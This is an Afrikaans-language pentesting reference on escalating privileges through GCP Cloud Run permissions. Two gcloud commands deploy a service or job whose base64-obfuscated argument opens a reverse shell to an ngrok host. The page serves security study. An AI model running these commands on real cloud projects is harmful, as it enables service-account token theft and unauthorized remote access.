Cloud Hardloop

Vir meer inligting oor Cloud Hardloop, kyk:

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

'n Aanvaller met hierdie toestemmings om 'n hardloopdiens te skep wat arbitrêre kode uitvoer (arbitrêre Docker-houer), 'n Diensrekening daaraan te heg, en die kode om die Diensrekening-token uit die metadata te eksfiltreer.

'n Uitbuitingskrip vir hierdie metode kan hier gevind word hier en die Docker-beeld kan hier gevind word hier.

Let daarop dat wanneer jy gcloud run deploy gebruik in plaas van net die diens te skep dit die update toestemming benodig. Kyk na 'n voorbeeld hier.

run.services.update , iam.serviceAccounts.actAs

Soos die vorige een maar deur 'n diens te opdateer:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Gee jouself vorige toestemmings oor Cloud Run.

run.jobs.create, run.jobs.run, (run.jobs.get)

Begin 'n taak met 'n omgekeerde dop om die diensrekening wat in die bevel aangedui word, te steel. Jy kan 'n exploit hier vind.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Soortgelyk aan die vorige een is dit moontlik om 'n taak te opdateer en die SA te opdateer, die bevel en dit uit te voer:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Gee jouself die vorige regte oor Cloud Jobs.

Verwysings

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/